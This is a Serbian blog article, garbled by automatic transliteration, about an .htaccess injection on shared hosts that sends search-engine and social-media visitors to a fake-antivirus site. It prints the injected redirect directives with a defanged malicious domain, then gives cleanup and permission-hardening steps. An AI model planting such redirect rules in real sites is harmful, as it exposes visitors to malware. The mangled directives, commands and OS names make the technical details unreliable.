Нови облик вируса што ја не видим много зна, утичу на сајтове хостоване на непоуздане сервери где се између њих могу „видети“ кориснички налози / налози поддомена. Конкретно, сви хостинг рачуни се стављају у директоријум "вхостс“, И право писања корисник директоријум „вхостс“ даје обичном кориснику ... препродавац у већини ситуација. То је типична метода веб сервера који не користе ВХМ / цПанел.
Цупринс
.Хтаццесс вирус ацтион - .хтаццесс хацк
Вирус утичу фајлове .хтаццесс Сајт жртве. И додао линије / Директива до преусмерите посетилаца (долазе са иахоо, мсн, гоогле, фацебоок, иаиндек, твиттер, миспаце итд. сајтови и портали са великим прометом) на неке веб локације које нуде "Антивирус“. Ради се о лажни антивирусни, Који сам написао у уводу Факе Антивирус одстрањивач.
Овако .хтаццесс утичу: (не приступате УРЛ адресе садржаја у наредним редовима)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3РевритеЕнгине Он
РевритеЦонд% {} ХТТП_РЕФЕРЕР Иандек *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Одноклассники *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ВКонтакте *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} Рамблер *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Цев.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Википедиа.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Блоггер. * $ [НЦ, ИЛИ].
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Баиду.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Кк.цом *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МиСпаце.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Твиттер *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Фацебоок.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Гоогле *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * уживо.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * АОЛ.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Бинг.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МСН.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Амазон.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Ебаи *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * ЛинкедИн.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Флицкр.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ливејасмин *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Сосо.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ДоублеЦлицк *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Порнхуб *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Оркут.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ЛивеЈоурнал *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {ХТТП_РЕФЕРЕР}. *wordpress. * $ [НЦ, ОР]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Иахоо *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * питати.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Екците *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР АлтаВиста *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * МСН.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Нетсцапе *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР ХотБот *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Иди.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Инфосеек *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} Мама *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Аллтхевеб *.. * $ [НЦ, ИЛИ]
РевритеЦонд% {} ХТТП_РЕФЕРЕР Лицос *.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Тражи.. * $ [НЦ, ИЛИ]
РевритеЦонд %{ХТТП_РЕФЕРЕР} .*метацrawлер.*$ [НЦ,ОР]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Пошта.. * $ [НЦ, ИЛИ]
РевритеЦонд% ХТТП_РЕФЕРЕР {} * Догпиле.. * $ [НЦ]ПрепишиЦонд% {ХТТП_УСЕР_АГЕНТ}. *Windows.*
РевритеРуле. * Хккп: //вввв.пеориавасцуларсургери.цом/маин.пхп? Х =% {ХТТП_ХОСТ} & и = Ј8ииидсар / кмиРј7В8НОиЈоКспА == & е = р [Р, Л]РевритеЦонд% {РЕКУЕСТ_ФИЛЕНАМЕ}! -Ф
РевритеЦонд% {РЕКУЕСТ_ФИЛЕНАМЕ}! -Д
РевритеЦонд %{РЕКУЕСТ_ФИЛЕНАМЕ} !.*јпг$|.*гиф$|.*пнг$
ПрепишиЦонд% {ХТТП_УСЕР_АГЕНТ}. *Windows.*
РевритеРуле. * Хккп: //вввв.пеориавасцуларсургери.цом/маин.пхп? Х =% {ХТТП_ХОСТ} & и = Ј8ииидсар / кмиРј7В8НОиЈоКспА == & е = 4 [Р, Л]
Они који користе WordPress они ће пронаћи ове редове у датотеци .хтаццесс од публиц_хтмл. Поред тога, вирус ствара идентичан .хтаццесс у фасцикли вп-цонтент.
*Постоје и ситуације у којима се уместо пеориавасцуларсургери.цом појављује днс.тхесоулфоодцафе.цом или друге адресе.
Шта овај вирус ради?
Једном преусмерен, посетиоца дочекује раширених руку поруком:
Упозорење!
Ваш рачунар садржи разне знакове присуства вируса и злонамерног софтвера. твој system захтева тренутну проверу вируса!
System Обезбеђење ће извршити брзо и бесплатно скенирање рачунара на вирусе и злонамерне програме.
Без обзира које дугме притиснемо, преусмерит ћемо се на страницу "Ми Цомпутер“, Створен за имитацију КСП дизајн. Овде аутоматски започиње „поступак скенирања“, на крају којег откривамо да смо „заражени“.
Након притиска на ОК или Цанцел, покренут ће се Довнлоаддатотеке сетуп.еке. Ово сетуп.еке је лажни антивирус који утичу на систем. Инсталираће низ злонамерних програма за даље ширење заражених веза, а поред тога и анти-вирус софтвер (такође лажна) коју жртва позива да купи.
Они који су већ оболели од овог облика вируса могу га користити Факе Антивирус одстрањивач. Такође се препоручује скенирање целог ХДД-а. препоручити Касперски Анти-Вирус или Касперски Анти-Вирус.
Овај облик вируса утиче на оперативни систем посетилаца са оперативним системима Windows КСП Windows Ме Windows КСНУМКС, Windows НТ Windows 98 si Windows 95. До данас нису познати случајеви заразе оперативним системима Windows Да, да Windows 7.
Како можемо уклонити овај .хтаццесс вирус са сервера и како можемо спречити инфекцију.
1. Анализа датотека и брисање сумњивих кодова. Да бисте били сигурни да то неће утицати само на датотеку .хтаццесс добро је анализирамо све датотеке .пхп si Јс..
2. Препишите .хтаццесс датотеку и подесите је chmod 644 или 744 са правима писања само на власник корисника.
3. Приликом креирања налога за хостинг за веб локацију, у фасцикли / дом или / веброот аутоматски ће створити директоријум који најчешће има корисничко име (корисник за цпанел, фтп, итд.). Да бисте спречили уписивање података и пренос вируса са једног корисника на другог, препоручује се да на свакој корисничкој фасцикли подесите:
chmod 644 или 744, 755 – 644 је назначено.
chown -Р корисничко име име_фасцикле.
цхгрп -Р име_корисника_име_име
лс-сви да бисте проверили да ли су режими правилно постављени. Нешто слично:
дрвк - к - к 12 динамицс динамицс 4096 6. мај 14:51 динамицс /
дрвк - к - к 10 дуран дуран 4096 7. марта 07:46 дуран /
дрвк - к - к 12 епрувета епрувета 4096 29. јануара 11:23 епрувета /
дрвкр-кр-к 14 екпресс екпресс 4096 26. фебруар 2009. екпресс /
дрвкр-кр-к 9 езо езо 4096 19. мај 01:09 езо /
дрвк - к - к 9 фарма фарма 4096 19. децембар 22:29 фарма /
Ако ће неко од горе наведених корисника имати ФТП Заражене датотеке, неће моћи да пошаље вирус другом хостованом кориснику. То је минимална мера заштите за заштиту рачуна хостованих на веб серверу.
Уобичајени елементи домена погођених овом врстом вируса.
Сви погођени домени преусмеравају посетиоце на сајтове који садрже „/маин.пхп? с = 4 & Х.".
Ово ".хтаццесс вирус”Утиче на било који тип ЦМС-а (Јоомла, WordPress, пхпББитд.) који користи .хтаццесс.
.хтаццесс вирус хаковање и преусмеравање.
